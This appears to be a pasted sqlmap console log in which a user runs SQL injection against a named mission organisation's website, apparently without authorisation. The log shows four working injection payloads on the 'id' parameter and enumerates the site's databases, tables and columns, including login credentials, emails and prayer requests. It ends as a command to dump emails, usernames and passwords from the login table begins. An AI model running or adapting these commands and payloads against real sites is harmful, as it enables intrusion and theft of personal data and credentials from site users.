Untitled

a guest
Aug 28th, 2017
  1. ___ ___| |_____ ___ ___ {1.0.4.0#dev}
  2. |_ -| . | | | .'| . |
  3. |___|_ |_|_|_|_|__,| _|
  4. |_| |_| http://sqlmap.org
  5.  
  6. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  7.  
  8. [*] starting at 08:59:40
  9.  
  10. [08:59:40] [INFO] testing connection to the target URL
  11. [08:59:43] [INFO] heuristics detected web page charset 'ISO-8859-2'
  12. [08:59:43] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
  13. [08:59:44] [INFO] testing if the target URL is stable
  14. [08:59:45] [INFO] target URL is stable
  15. [08:59:45] [INFO] testing if GET parameter 'id' is dynamic
  16. [08:59:46] [WARNING] GET parameter 'id' does not appear dynamic
  17. [08:59:46] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
  18. [08:59:46] [INFO] testing for SQL injection on GET parameter 'id'
  19. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
  20. for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
  21. [08:59:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  22. [08:59:58] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request(s)
  23. [08:59:59] [WARNING] reflective value(s) found and filtering out
  24. [09:00:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
  25. [09:00:30] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
  26. [09:01:08] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)'
  27. [09:01:14] [INFO] GET parameter 'id' seems to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)' injectable
  28. [09:01:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
  29. [09:01:15] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
  30. [09:01:15] [INFO] GET parameter 'id' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable
  31. [09:01:15] [INFO] testing 'MySQL inline queries'
  32. [09:01:16] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
  33. [09:01:16] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
  34. [09:01:17] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
  35. [09:01:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  36. [09:01:17] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
  37. [09:01:17] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
  38. [09:01:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
  39. [09:01:19] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT)'
  40. [09:01:24] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request(s)
  41. [09:01:24] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for few minutes and rerun without flag T in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
  42. [09:01:30] [INFO] GET parameter 'id' seems to be 'MySQL >= 5.0.12 OR time-based blind (SELECT)' injectable
  43. [09:01:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
  44. [09:01:30] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
  45. [09:01:31] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request(s)
  46. [09:01:32] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
  47. [09:01:35] [INFO] target URL appears to have 13 columns in query
  48. [09:01:41] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
  49. [09:01:41] [WARNING] in OR boolean-based injections, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
  50. GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
  51. sqlmap identified the following injection point(s) with a total of 241 HTTP(s) requests:
  52. ---
  53. Parameter: id (GET)
  54. Type: boolean-based blind
  55. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
  56. Payload: id=29 OR NOT 3833=3833#
  57.  
  58. Type: error-based
  59. Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  60. Payload: id=29 OR (SELECT 4234 FROM(SELECT COUNT(*),CONCAT(0x7178706271,(SELECT (ELT(4234=4234,1))),0x716a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  61.  
  62. Type: AND/OR time-based blind
  63. Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
  64. Payload: id=29 OR (SELECT * FROM (SELECT(SLEEP(5)))dSer)
  65.  
  66. Type: UNION query
  67. Title: Generic UNION query (NULL) - 13 columns
  68. Payload: id=29 UNION ALL SELECT NULL,CONCAT(0x7178706271,0x636c49464162666d765a464c537a534a6f62594a5248666d444b584178796967557a494864566145,0x716a717171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
  69. ---
  70. [09:02:32] [INFO] the back-end DBMS is MySQL
  71. web application technology: PHP 5.6.31, Apache 2.4.27
  72. back-end DBMS: MySQL 5.0
  73. [09:02:32] [INFO] fetching database names
  74. [09:02:32] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request(s)
  75. [09:02:34] [INFO] the SQL query used returns 2 entries
  76. [09:02:34] [INFO] retrieved: information_schema
  77. [09:02:35] [INFO] retrieved: acfmissi_acfmdb
  78. available databases [2]:
  79. [*] acfmissi_acfmdb
  80. [*] information_schema
  81.  
  82. [09:02:35] [INFO] fetched data logged to text files under '/root/.sqlmap/output/acfmission.org'
  83. root@BitCoin:/home/helmi# sqlmap -u http://acfmission.org/acfmdisp.php?id=29 -D acfmissi_acfmdb --table
  92. [*] starting at 09:03:10
  93.  
  94. [09:03:10] [INFO] resuming back-end DBMS 'mysql'
  95. [09:03:11] [INFO] testing connection to the target URL
  96. [09:03:13] [INFO] heuristics detected web page charset 'ISO-8859-2'
  97. sqlmap resumed the following injection point(s) from stored session:
  98. ---
  99. Parameter: id (GET)
  100. Type: boolean-based blind
  101. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
  102. Payload: id=29 OR NOT 3833=3833#
  103.  
  104. Type: error-based
  105. Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  106. Payload: id=29 OR (SELECT 4234 FROM(SELECT COUNT(*),CONCAT(0x7178706271,(SELECT (ELT(4234=4234,1))),0x716a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  107.  
  108. Type: AND/OR time-based blind
  109. Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
  110. Payload: id=29 OR (SELECT * FROM (SELECT(SLEEP(5)))dSer)
  111.  
  112. Type: UNION query
  113. Title: Generic UNION query (NULL) - 13 columns
  114. Payload: id=29 UNION ALL SELECT NULL,CONCAT(0x7178706271,0x636c49464162666d765a464c537a534a6f62594a5248666d444b584178796967557a494864566145,0x716a717171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
  115. ---
  116. [09:03:13] [INFO] the back-end DBMS is MySQL
  117. web application technology: PHP 5.6.31, Apache 2.4.27
  118. back-end DBMS: MySQL 5.0
  119. [09:03:13] [INFO] fetching tables for database: 'acfmissi_acfmdb'
  120. [09:03:14] [INFO] the SQL query used returns 19 entries
  121. [09:03:15] [INFO] retrieved: announcement
  122. [09:03:16] [INFO] retrieved: article
  123. [09:03:17] [INFO] retrieved: comments
  124. [09:03:18] [INFO] retrieved: country
  125. [09:03:18] [INFO] retrieved: doctype
  126. [09:03:19] [INFO] retrieved: document
  127. [09:03:20] [INFO] retrieved: enquiry
  128. [09:03:21] [INFO] retrieved: events
  129. [09:03:22] [INFO] retrieved: eventtype
  130. [09:03:23] [INFO] retrieved: gallery
  131. [09:03:24] [INFO] retrieved: link
  132. [09:03:24] [INFO] retrieved: login
  133. [09:03:25] [INFO] retrieved: mail
  134. [09:03:26] [INFO] retrieved: news
  135. [09:03:27] [INFO] retrieved: news category
  136. [09:03:28] [INFO] retrieved: page
  137. [09:03:29] [INFO] retrieved: prayereq
  138. [09:03:30] [INFO] retrieved: testimony
  139. [09:03:30] [INFO] retrieved: userlogin
  140. Database: acfmissi_acfmdb
  141. [19 tables]
  142. +---------------+
  143. | news category |
  144. | announcement |
  145. | article |
  146. | comments |
  147. | country |
  148. | doctype |
  149. | document |
  150. | enquiry |
  151. | events |
  152. | eventtype |
  153. | gallery |
  154. | link |
  155. | login |
  156. | mail |
  157. | news |
  158. | page |
  159. | prayereq |
  160. | testimony |
  161. | userlogin |
  162. +---------------+
  163.  
  164. [09:03:31] [INFO] fetched data logged to text files under '/root/.sqlmap/output/acfmission.org'
  165. root@BitCoin:/home/helmi# sqlmap -u http://acfmission.org/acfmdisp.php?id=29 -D acfmissi_acfmdb --columns
  174. [*] starting at 09:04:13
  175.  
  176. [09:04:14] [INFO] resuming back-end DBMS 'mysql'
  177. [09:04:15] [INFO] testing connection to the target URL
  178. [09:04:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
  179. sqlmap resumed the following injection point(s) from stored session:
  180. ---
  181. Parameter: id (GET)
  182. Type: boolean-based blind
  183. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
  184. Payload: id=29 OR NOT 3833=3833#
  185.  
  186. Type: error-based
  187. Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  188. Payload: id=29 OR (SELECT 4234 FROM(SELECT COUNT(*),CONCAT(0x7178706271,(SELECT (ELT(4234=4234,1))),0x716a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  189.  
  190. Type: AND/OR time-based blind
  191. Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
  192. Payload: id=29 OR (SELECT * FROM (SELECT(SLEEP(5)))dSer)
  193.  
  194. Type: UNION query
  195. Title: Generic UNION query (NULL) - 13 columns
  196. Payload: id=29 UNION ALL SELECT NULL,CONCAT(0x7178706271,0x636c49464162666d765a464c537a534a6f62594a5248666d444b584178796967557a494864566145,0x716a717171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
  197. ---
  198. [09:04:18] [INFO] the back-end DBMS is MySQL
  199. web application technology: PHP 5.6.31, Apache 2.4.27
  200. back-end DBMS: MySQL 5.0
  201. [09:04:18] [INFO] fetching tables for database: 'acfmissi_acfmdb'
  202. [09:04:18] [INFO] the SQL query used returns 19 entries
  203. [09:04:18] [INFO] resumed: announcement
  204. [09:04:18] [INFO] resumed: article
  205. [09:04:18] [INFO] resumed: comments
  206. [09:04:18] [INFO] resumed: country
  207. [09:04:18] [INFO] resumed: doctype
  208. [09:04:18] [INFO] resumed: document
  209. [09:04:18] [INFO] resumed: enquiry
  210. [09:04:18] [INFO] resumed: events
  211. [09:04:18] [INFO] resumed: eventtype
  212. [09:04:18] [INFO] resumed: gallery
  213. [09:04:18] [INFO] resumed: link
  214. [09:04:18] [INFO] resumed: login
  215. [09:04:18] [INFO] resumed: mail
  216. [09:04:18] [INFO] resumed: news
  217. [09:04:18] [INFO] resumed: news category
  218. [09:04:18] [INFO] resumed: page
  219. [09:04:18] [INFO] resumed: prayereq
  220. [09:04:18] [INFO] resumed: testimony
  221. [09:04:18] [INFO] resumed: userlogin
  222. [09:04:18] [INFO] fetching columns for table 'announcement' in database 'acfmissi_acfmdb'
  223. [09:04:19] [INFO] the SQL query used returns 5 entries
  224. [09:04:20] [INFO] retrieved: "ID","int(12)"
  225. [09:04:21] [INFO] retrieved: "Content","text"
  226. [09:04:22] [INFO] retrieved: "Date","date"
  227. [09:04:23] [INFO] retrieved: "Title","varchar(200)"
  228. [09:04:24] [INFO] retrieved: "pic","varchar(100)"
  229. [09:04:24] [INFO] fetching columns for table 'prayereq' in database 'acfmissi_acfmdb'
  230. [09:04:25] [INFO] the SQL query used returns 4 entries
  231. [09:04:26] [INFO] retrieved: "id","int(34)"
  232. [09:04:27] [INFO] retrieved: "Name","varchar(80)"
  233. [09:04:27] [INFO] retrieved: "Email","varchar(80)"
  234. [09:04:28] [INFO] retrieved: "Prayer","text"
  235. [09:04:28] [INFO] fetching columns for table 'userlogin' in database 'acfmissi_acfmdb'
  236. [09:04:29] [INFO] the SQL query used returns 3 entries
  237. [09:04:30] [INFO] retrieved: "ID","int(18)"
  238. [09:04:31] [INFO] retrieved: "Username","varchar(49)"
  239. [09:04:32] [INFO] retrieved: "Password","varchar(56)"
  240. [09:04:32] [INFO] fetching columns for table 'mail' in database 'acfmissi_acfmdb'
  241. [09:04:33] [INFO] the SQL query used returns 5 entries
  242. [09:04:34] [INFO] retrieved: "id","int(18)"
  243. [09:04:34] [INFO] retrieved: "name","varchar(60)"
  244. [09:04:35] [INFO] retrieved: "email","varchar(80)"
  245. [09:04:36] [INFO] retrieved: "unsubscribed","varchar(100)"
  246. [09:04:37] [INFO] retrieved: "sendmsg","varchar(100)"
  247. [09:04:37] [INFO] fetching columns for table 'enquiry' in database 'acfmissi_acfmdb'
  248. [09:04:38] [INFO] the SQL query used returns 4 entries
  249. [09:04:39] [INFO] retrieved: "id","int(15)"
  250. [09:04:40] [INFO] retrieved: "Name","varchar(60)"
  251. [09:04:41] [INFO] retrieved: "Email","varchar(65)"
  252. [09:04:42] [INFO] retrieved: "Comment","varchar(250)"
  253. [09:04:42] [INFO] fetching columns for table 'country' in database 'acfmissi_acfmdb'
  254. [09:04:42] [INFO] the SQL query used returns 2 entries
  255. [09:04:43] [INFO] retrieved: "id","int(255) unsigned"
  256. [09:04:44] [INFO] retrieved: "country_name","varchar(255)"
  257. [09:04:44] [INFO] fetching columns for table 'testimony' in database 'acfmissi_acfmdb'
  258. [09:04:45] [INFO] the SQL query used returns 5 entries
  259. [09:04:46] [INFO] retrieved: "id","int(34)"
  260. [09:04:47] [INFO] retrieved: "Name","varchar(80)"
  261. [09:04:48] [INFO] retrieved: "Email","varchar(80)"
  262. [09:04:49] [INFO] retrieved: "Testimony","text"
  263. [09:04:49] [INFO] retrieved: "Dateposted","date"
  264. [09:04:49] [INFO] fetching columns for table 'doctype' in database 'acfmissi_acfmdb'
  265. [09:04:50] [INFO] the SQL query used returns 2 entries
  266. [09:04:51] [INFO] retrieved: "id","int(35)"
  267. [09:04:52] [INFO] retrieved: "documents","varchar(99)"
  268. [09:04:52] [INFO] fetching columns for table 'comments' in database 'acfmissi_acfmdb'
  269. [09:04:53] [INFO] the SQL query used returns 5 entries
  270. [09:04:54] [INFO] retrieved: "ID","int(18)"
  271. [09:04:55] [INFO] retrieved: "Name","varchar(100)"
  272. [09:04:56] [INFO] retrieved: "Email","varchar(100)"
  273. [09:04:57] [INFO] retrieved: "comments","text"
  274. [09:04:57] [INFO] retrieved: "visible","varchar(120)"
  275. [09:04:57] [INFO] fetching columns for table 'gallery' in database 'acfmissi_acfmdb'
  276. [09:04:58] [INFO] the SQL query used returns 5 entries
  277. [09:04:59] [INFO] retrieved: "id","int(16)"
  278. [09:05:00] [INFO] retrieved: "eventTitle","varchar(300)"
  279. [09:05:01] [INFO] retrieved: "pics","varchar(100)"
  280. [09:05:02] [INFO] retrieved: "pictitle","varchar(250)"
  281. [09:05:03] [INFO] retrieved: "Date","date"
  282. [09:05:03] [INFO] fetching columns for table 'link' in database 'acfmissi_acfmdb'
  283. [09:05:04] [INFO] the SQL query used returns 3 entries
  284. [09:05:05] [INFO] retrieved: "id","int(60)"
  285. [09:05:05] [INFO] retrieved: "LinkName","varchar(100)"
  286. [09:05:06] [INFO] retrieved: "link_order","varchar(100)"
  287. [09:05:06] [INFO] fetching columns for table 'eventtype' in database 'acfmissi_acfmdb'
  288. [09:05:07] [INFO] the SQL query used returns 2 entries
  289. [09:05:08] [INFO] retrieved: "id","int(55)"
  290. [09:05:09] [INFO] retrieved: "category","varchar(180)"
  291. [09:05:09] [INFO] fetching columns for table 'article' in database 'acfmissi_acfmdb'
  292. [09:05:10] [INFO] the SQL query used returns 10 entries
  293. [09:05:11] [INFO] retrieved: "Id","int(17)"
  294. [09:05:12] [INFO] retrieved: "Event","varchar(100)"
  295. [09:05:12] [INFO] retrieved: "Speaker","varchar(80)"
  296. [09:05:13] [INFO] retrieved: "Title","varchar(69)"
  297. [09:05:14] [INFO] retrieved: "Summary","varchar(280)"
  298. [09:05:15] [INFO] retrieved: "Article","longtext"
  299. [09:05:16] [INFO] retrieved: "Date","date"
  300. [09:05:18] [INFO] retrieved: "Dateposted","date"
  301. [09:05:18] [INFO] retrieved: "pics","varchar(100)"
  302. [09:05:19] [INFO] retrieved: "display","varchar(20)"
  303. [09:05:19] [INFO] fetching columns for table 'login' in database 'acfmissi_acfmdb'
  304. [09:05:20] [INFO] the SQL query used returns 6 entries
  305. [09:05:21] [INFO] retrieved: "ID","int(18)"
  306. [09:05:22] [INFO] retrieved: "username","varchar(25)"
  307. [09:05:23] [INFO] retrieved: "password","varchar(100)"
  308. [09:05:24] [INFO] retrieved: "name","varchar(35)"
  309. [09:05:25] [INFO] retrieved: "email","varchar(60)"
  310. [09:05:25] [INFO] retrieved: "level","varchar(25)"
  311. [09:05:25] [INFO] fetching columns for table 'document' in database 'acfmissi_acfmdb'
  312. [09:05:26] [INFO] the SQL query used returns 8 entries
  313. [09:05:27] [INFO] retrieved: "ID","int(16)"
  314. [09:05:28] [INFO] retrieved: "category","varchar(25)"
  315. [09:05:29] [INFO] retrieved: "Description","text"
  316. [09:05:30] [INFO] retrieved: "document","varchar(60)"
  317. [09:05:31] [INFO] retrieved: "date","date"
  318. [09:05:32] [INFO] retrieved: "doctitle","varchar(55)"
  319. [09:05:32] [INFO] retrieved: "display","varchar(20)"
  320. [09:05:33] [INFO] retrieved: "Pics","varchar(80)"
  321. [09:05:33] [INFO] fetching columns for table 'news' in database 'acfmissi_acfmdb'
  322. [09:05:34] [INFO] the SQL query used returns 12 entries
  323. [09:05:35] [INFO] retrieved: "ID","int(16)"
  324. [09:05:36] [INFO] retrieved: "Title","varchar(250)"
  325. [09:05:37] [INFO] retrieved: "News_Category","varchar(200)"
  326. [09:05:38] [INFO] retrieved: "Summary","varchar(350)"
  327. [09:05:39] [INFO] retrieved: "content","text"
  328. [09:05:39] [INFO] retrieved: "Date","date"
  329. [09:05:40] [INFO] retrieved: "Source","varchar(85)"
  330. [09:05:41] [INFO] retrieved: "pics","varchar(80)"
  331. [09:05:42] [INFO] retrieved: "file","varchar(80)"
  332. [09:05:43] [INFO] retrieved: "Postedby","varchar(80)"
  333. [09:05:44] [INFO] retrieved: "Display","varchar(80)"
  334. [09:05:45] [INFO] retrieved: "Main","varchar(29)"
  335. [09:05:45] [INFO] fetching columns for table 'events' in database 'acfmissi_acfmdb'
  336. [09:05:46] [INFO] the SQL query used returns 11 entries
  337. [09:05:46] [INFO] retrieved: "ID","int(18)"
  338. [09:05:47] [INFO] retrieved: "eventTitle","varchar(256)"
  339. [09:05:48] [INFO] retrieved: "StartDate","date"
  340. [09:05:49] [INFO] retrieved: "eventDuration","varchar(100)"
  341. [09:05:50] [INFO] retrieved: "eventType","varchar(85)"
  342. [09:05:51] [INFO] retrieved: "content","text"
  343. [09:05:52] [INFO] retrieved: "PaperTitle","varchar(256)"
  344. [09:05:53] [INFO] retrieved: "Author","varchar(35)"
  345. [09:05:53] [INFO] retrieved: "Status","varchar(25)"
  346. [09:05:54] [INFO] retrieved: "file","text"
  347. [09:05:55] [INFO] retrieved: "dateposted","date"
  348. [09:05:55] [INFO] fetching columns for table 'news category' in database 'acfmissi_acfmdb'
  349. [09:05:56] [INFO] the SQL query used returns 2 entries
  350. [09:05:57] [INFO] retrieved: "id","int(55)"
  351. [09:05:58] [INFO] retrieved: "Category","varchar(100)"
  352. [09:05:58] [INFO] fetching columns for table 'page' in database 'acfmissi_acfmdb'
  353. [09:05:59] [INFO] the SQL query used returns 13 entries
  354. [09:06:00] [INFO] retrieved: "id","int(24)"
  355. [09:06:01] [INFO] retrieved: "Pagetitle","varchar(80)"
  356. [09:06:01] [INFO] retrieved: "Mainpage","varchar(100)"
  357. [09:06:02] [INFO] retrieved: "linktype","varchar(100)"
  358. [09:06:03] [INFO] retrieved: "linkorder","varchar(100)"
  359. [09:06:04] [INFO] retrieved: "pics1","varchar(100)"
  360. [09:06:05] [INFO] retrieved: "Pics2","varchar(100)"
  361. [09:06:06] [INFO] retrieved: "Maincontent","text"
  362. [09:06:07] [INFO] retrieved: "Content1","text"
  363. [09:06:08] [INFO] retrieved: "Content2","text"
  364. [09:06:08] [INFO] retrieved: "Content3","text"
  365. [09:06:09] [INFO] retrieved: "Display","text"
  366. [09:06:10] [INFO] retrieved: "datecreated","date"
  367. Database: acfmissi_acfmdb
  368. Table: announcement
  369. [5 columns]
  370. +---------+--------------+
  371. | Column | Type |
  372. +---------+--------------+
  373. | Date | date |
  374. | Content | text |
  375. | ID | int(12) |
  376. | pic | varchar(100) |
  377. | Title | varchar(200) |
  378. +---------+--------------+
  379.  
  380. Database: acfmissi_acfmdb
  381. Table: page
  382. [13 columns]
  383. +-------------+--------------+
  384. | Column | Type |
  385. +-------------+--------------+
  386. | Content1 | text |
  387. | Content2 | text |
  388. | Content3 | text |
  389. | datecreated | date |
  390. | Display | text |
  391. | id | int(24) |
  392. | linkorder | varchar(100) |
  393. | linktype | varchar(100) |
  394. | Maincontent | text |
  395. | Mainpage | varchar(100) |
  396. | Pagetitle | varchar(80) |
  397. | pics1 | varchar(100) |
  398. | Pics2 | varchar(100) |
  399. +-------------+--------------+
  400.  
  401. Database: acfmissi_acfmdb
  402. Table: document
  403. [8 columns]
  404. +-------------+-------------+
  405. | Column | Type |
  406. +-------------+-------------+
  407. | date | date |
  408. | category | varchar(25) |
  409. | Description | text |
  410. | display | varchar(20) |
  411. | doctitle | varchar(55) |
  412. | document | varchar(60) |
  413. | ID | int(16) |
  414. | Pics | varchar(80) |
  415. +-------------+-------------+
  416.  
  417. Database: acfmissi_acfmdb
  418. Table: enquiry
  419. [4 columns]
  420. +---------+--------------+
  421. | Column | Type |
  422. +---------+--------------+
  423. | Comment | varchar(250) |
  424. | Email | varchar(65) |
  425. | id | int(15) |
  426. | Name | varchar(60) |
  427. +---------+--------------+
  428.  
  429. Database: acfmissi_acfmdb
  430. Table: country
  431. [2 columns]
  432. +--------------+-------------------+
  433. | Column | Type |
  434. +--------------+-------------------+
  435. | country_name | varchar(255) |
  436. | id | int(255) unsigned |
  437. +--------------+-------------------+
  438.  
  439. Database: acfmissi_acfmdb
  440. Table: testimony
  441. [5 columns]
  442. +------------+-------------+
  443. | Column | Type |
  444. +------------+-------------+
  445. | Dateposted | date |
  446. | Email | varchar(80) |
  447. | id | int(34) |
  448. | Name | varchar(80) |
  449. | Testimony | text |
  450. +------------+-------------+
  451.  
  452. Database: acfmissi_acfmdb
  453. Table: doctype
  454. [2 columns]
  455. +-----------+-------------+
  456. | Column | Type |
  457. +-----------+-------------+
  458. | documents | varchar(99) |
  459. | id | int(35) |
  460. +-----------+-------------+
  461.  
  462. Database: acfmissi_acfmdb
  463. Table: comments
  464. [5 columns]
  465. +----------+--------------+
  466. | Column | Type |
  467. +----------+--------------+
  468. | comments | text |
  469. | Email | varchar(100) |
  470. | ID | int(18) |
  471. | Name | varchar(100) |
  472. | visible | varchar(120) |
  473. +----------+--------------+
  474.  
  475. Database: acfmissi_acfmdb
  476. Table: events
  477. [11 columns]
  478. +---------------+--------------+
  479. | Column | Type |
  480. +---------------+--------------+
  481. | Author | varchar(35) |
  482. | content | text |
  483. | dateposted | date |
  484. | eventDuration | varchar(100) |
  485. | eventTitle | varchar(256) |
  486. | eventType | varchar(85) |
  487. | file | text |
  488. | ID | int(18) |
  489. | PaperTitle | varchar(256) |
  490. | StartDate | date |
  491. | Status | varchar(25) |
  492. +---------------+--------------+
  493.  
  494. Database: acfmissi_acfmdb
  495. Table: eventtype
  496. [2 columns]
  497. +----------+--------------+
  498. | Column | Type |
  499. +----------+--------------+
  500. | category | varchar(180) |
  501. | id | int(55) |
  502. +----------+--------------+
  503.  
  504. Database: acfmissi_acfmdb
  505. Table: link
  506. [3 columns]
  507. +------------+--------------+
  508. | Column | Type |
  509. +------------+--------------+
  510. | id | int(60) |
  511. | link_order | varchar(100) |
  512. | LinkName | varchar(100) |
  513. +------------+--------------+
  514.  
  515. Database: acfmissi_acfmdb
  516. Table: userlogin
  517. [3 columns]
  518. +----------+-------------+
  519. | Column | Type |
  520. +----------+-------------+
  521. | ID | int(18) |
  522. | Password | varchar(56) |
  523. | Username | varchar(49) |
  524. +----------+-------------+
  525.  
  526. Database: acfmissi_acfmdb
  527. Table: mail
  528. [5 columns]
  529. +--------------+--------------+
  530. | Column | Type |
  531. +--------------+--------------+
  532. | email | varchar(80) |
  533. | id | int(18) |
  534. | name | varchar(60) |
  535. | sendmsg | varchar(100) |
  536. | unsubscribed | varchar(100) |
  537. +--------------+--------------+
  538.  
  539. Database: acfmissi_acfmdb
  540. Table: article
  541. [10 columns]
  542. +------------+--------------+
  543. | Column | Type |
  544. +------------+--------------+
  545. | Date | date |
  546. | Article | longtext |
  547. | Dateposted | date |
  548. | display | varchar(20) |
  549. | Event | varchar(100) |
  550. | Id | int(17) |
  551. | pics | varchar(100) |
  552. | Speaker | varchar(80) |
  553. | Summary | varchar(280) |
  554. | Title | varchar(69) |
  555. +------------+--------------+
  556.  
  557. Database: acfmissi_acfmdb
  558. Table: prayereq
  559. [4 columns]
  560. +--------+-------------+
  561. | Column | Type |
  562. +--------+-------------+
  563. | Email | varchar(80) |
  564. | id | int(34) |
  565. | Name | varchar(80) |
  566. | Prayer | text |
  567. +--------+-------------+
  568.  
  569. Database: acfmissi_acfmdb
  570. Table: news
  571. [12 columns]
  572. +---------------+--------------+
  573. | Column | Type |
  574. +---------------+--------------+
  575. | Date | date |
  576. | content | text |
  577. | Display | varchar(80) |
  578. | file | varchar(80) |
  579. | ID | int(16) |
  580. | Main | varchar(29) |
  581. | News_Category | varchar(200) |
  582. | pics | varchar(80) |
  583. | Postedby | varchar(80) |
  584. | Source | varchar(85) |
  585. | Summary | varchar(350) |
  586. | Title | varchar(250) |
  587. +---------------+--------------+
  588.  
  589. Database: acfmissi_acfmdb
  590. Table: gallery
  591. [5 columns]
  592. +------------+--------------+
  593. | Column | Type |
  594. +------------+--------------+
  595. | Date | date |
  596. | eventTitle | varchar(300) |
  597. | id | int(16) |
  598. | pics | varchar(100) |
  599. | pictitle | varchar(250) |
  600. +------------+--------------+
  601.  
  602. Database: acfmissi_acfmdb
  603. Table: news category
  604. [2 columns]
  605. +----------+--------------+
  606. | Column | Type |
  607. +----------+--------------+
  608. | Category | varchar(100) |
  609. | id | int(55) |
  610. +----------+--------------+
  611.  
  612. Database: acfmissi_acfmdb
  613. Table: login
  614. [6 columns]
  615. +----------+--------------+
  616. | Column | Type |
  617. +----------+--------------+
  618. | level | varchar(25) |
  619. | email | varchar(60) |
  620. | ID | int(18) |
  621. | name | varchar(35) |
  622. | password | varchar(100) |
  623. | username | varchar(25) |
  624. +----------+--------------+
  625.  
  626. [09:06:10] [INFO] fetched data logged to text files under '/root/.sqlmap/output/acfmission.org'
  627. root@BitCoin:/home/helmi# sqlmap -u http://acfmission.org/acfmdisp.php?id=29 -D acfmissi_acfmdb -T login -C email,username,password,name,ID --dump
[*] starting at 09:07:20

[09:07:21] [INFO] resuming back-end DBMS 'mysql'
[09:07:22] [INFO] testing connection to the target URL
[09:07:25] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: id=29 OR NOT 3833=3833#

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=29 OR (SELECT 4234 FROM(SELECT COUNT(*),CONCAT(0x7178706271,(SELECT (ELT(4234=4234,1))),0x716a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
Payload: id=29 OR (SELECT * FROM (SELECT(SLEEP(5)))dSer)

Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: id=29 UNION ALL SELECT NULL,CONCAT(0x7178706271,0x636c49464162666d765a464c537a534a6f62594a5248666d444b584178796967557a494864566145,0x716a717171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[09:07:25] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.31, Apache 2.4.27
back-end DBMS: MySQL 5.0
